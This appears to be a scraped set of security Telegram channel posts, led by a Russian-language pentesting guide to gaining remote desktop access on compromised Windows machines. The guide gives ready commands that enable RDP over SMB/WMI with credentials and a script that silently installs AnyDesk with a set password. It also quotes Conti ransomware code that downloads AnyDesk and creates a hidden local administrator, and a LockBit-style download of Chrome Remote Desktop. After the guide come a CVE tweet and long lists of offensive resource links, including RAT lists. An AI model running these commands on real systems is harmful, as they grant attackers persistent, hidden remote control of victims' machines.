All Security Engineering Courses

Всем привет! В чате иногда возникает вопрос: «А как обеспечить себя графическим интерфейсом в ходе пентестов?» И иногда действительно хочется посмотреть на чужой монитор своими глазами, отойдя от замыленных зеленых консолек. В посте собрал список инструментов для решения такой задачи :) Самый простой способ — включай RDP.

nxc smb 10.10.10.10 -u admin -p admin -M rdp -o ACTION=enable METHOD=smb

nxc wmi 10.10.10.10 -u admin -p admin -M rdp -o ACTION=enable METHOD=wmi

# опционально добавляем себя в Remote Desktop Users

Однако для совершения этой операции потребуются права админа, а они есть далеко не всегда, поэтому мы можем посмотреть в сторону VNC, например, POC vncdll. Впрочем, иногда смотрят в сторону AnyDesk. Для развертывания есть скрипт-ванлайнер:

# deploy.cmd
C:\Users\victim\AppData\Local\Temp\anydesk.exe --install C:\Users\victim\AppData\Local\AnyDesk --start-with-win --silent
del C:\Users\victim\AppData\Local\Temp\anydesk.exe
echo Passw0rd! | C:\Users\victim\AppData\Local\AnyDesk\AnyDesk.exe --set-password
for /f "delims=" %i in ('C:\Users\victim\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i

# Запускаем скрипт
cme smb 192.168.0.1 -u victim -p 'Passw0rd!' -x deploy.cmd

Этим способом любит пользоваться Conti, они разворачивают вот так:

Function AnyDesk {

   mkdir "C:\ProgramData\AnyDesk"
   # Download AnyDesk
   $clnt = new-object System.Net.WebClient
   $url = "http://download.anydesk.com/AnyDesk.exe"
   $file = "C:\ProgramData\AnyDesk.exe"
   $clnt.DownloadFile($url,$file)


   cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent


   cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password


   net user oldadministrator "qc69t4B#Z0kE3" /add
   net localgroup Administrators oldadministrator /ADD
   reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f

   cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id

   }

  AnyDesk

А их коллеги — LockBit — разворачивают Google Chrome Remote Desktop:

# Download from Google
powershell  -c (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $env:ProgramData+'\\1.msi')

# Install
msiexec /i C:\\ProgramData\\1.msi

Наконец, в нашем небольшом чатике коллеги накидали иные варианты: - https://rustdesk.com/ ; - https://www.supremocontrol.com/ ; - https://www.n-able.com/products/n-sight-rmm ; - https://github.com/miroslavpejic85/p2p ; - https://github.com/ps1337/reinschauer .

PENTESTING WITH PARROT OS Learn Hacking from Basic to Pro -------------------------------------------------------- Channel Link ➧More Channels | ➧Add Chat | ➧Shop

😈 [ Synacktiv @Synacktiv ] Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d. 🔗 https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025 🐥 [ tweet ]

ALL IN ONE AWSOME CYBERSEC RESOURCES By #TheStarkArmy (All open source resources) Awesome Red Team Ops https://github.com/CyberSecurityUP/Awesome-Red-Team-Operations Awesome Red Teaming https://github.com/yeyintminthuhtut/Awesome-Red-Teaming Awesome Red Team ToolKit https://0x1.gitlab.io/pentesting/Red-Teaming-Toolkit/ Awesome Blue Team Ops https://github.com/fabacab/awesome-cybersecurity-blueteam Awesome OSINT https://github.com/jivoi/awesome-osint Awesome DevSecOps https://github.com/devsecops/awesome-devsecop Awesome Pentest https://github.com/enaqx/awesome-pentest Awesome Cloud Pentest https://github.com/CyberSecurityUP/Awesome-Cloud-PenTest Awesome Shodan https://github.com/jakejarvis/awesome-shodan-queries Awesome AWS Security https://github.com/jassics/awesome-aws-security Awesome Malware Analysis & Reverse Engineering https://github.com/CyberSecurityUP/Awesome-Malware-Analysis-Reverse-Engineering Awesome Malware Analysis https://github.com/rshipp/awesome-malware-analysis The Cyber Security https://t.me/+M0_cfkd6HDxkYzI1 Awesome Computer Forensic https://github.com/cugu/awesome-forensics Awesome Cloud Security https://github.com/4ndersonLin/awesome-cloud-security Awesome Reverse Engineering https://github.com/tylerha97/awesome-reversing Awesome Threat Intelligence https://github.com/hslatman/awesome-threat-intelligence Awesome SOC https://github.com/cyb3rxp/awesome-soc Awesome Social Engineering https://github.com/v2-dev/awesome-social-engineering Awesome Web Security https://github.com/qazbnm456/awesome-web-security#prototype-pollution Awesome Forensics https://github.com/cugu/awesome-forensics Awesome API Security https://github.com/arainho/awesome-api-security Awesome WEB3 https://github.com/Anugrahsr/Awesome-web3-Security Awesome Incident Response https://github.com/Correia-jpv/fucking-awesome-incident-response Awesome Search Engines https://github.com/edoardottt/awesome-hacker-search-engines Awesome Smart Contract Security https://github.com/saeidshirazi/Awesome-Smart-Contract-Security The Cyber Security https://t.me/+M0_cfkd6HDxkYzI1 Awesome Terraform https://github.com/shuaibiyy/awesome-terraform Awesome Cloud Pentest https://github.com/CyberSecurityUP/Awesome-Cloud-PenTest Awesome Burpsuite Extensions https://github.com/snoopysecurity/awesome-burp-extensions Awesome IOT https://github.com/phodal/awesome-iot/blob/master/README.md Awesome IOS Security https://github.com/Cy-clon3/awesome-ios-security Awesome Embedded & IOT Security https://github.com/fkie-cad/awesome-embedded-and-iot-security Awesome OSINT Bots https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT#-bots Awesome IOT Hacks https://github.com/nebgnahz/awesome-iot-hacks Awesome WEB3 Security https://github.com/Anugrahsr/Awesome-web3-Security Awesome Security https://github.com/sbilly/awesome-security Awesome Reversing https://github.com/tylerha97/awesome-reversing Awesome Piracy https://github.com/Igglybuff/awesome-piracy Awesome Web Hacking https://github.com/infoslack/awesome-web-hacking Awesome Memory Forensics https://github.com/digitalisx/awesome-memory-forensics Awesome OSCP https://github.com/0x4D31/awesome-oscp Awesome RAT https://github.com/alphaSeclab/awesome-rat Learn Hacking from Basic to Pro -------------------------------------------------------- Channel Link ➧Add Chat | ➧Shop

Awvso36nh alfa network https://www.amazon.com/s?k=awvso36nh+alfa+network&crid=2WOJNRB0H3WD5&sprefix=awvso36nh+alfa+network%2Caps%2C179&ref=nb_sb_noss_2

Alfaawus036nh-5 https://www.amazon.com/s?k=alfaawus036nh-5&crid=32ICFAR9NMUIU&sprefix=alfaawus036nh-5%2Caps%2C193&ref=nb_sb_noss_2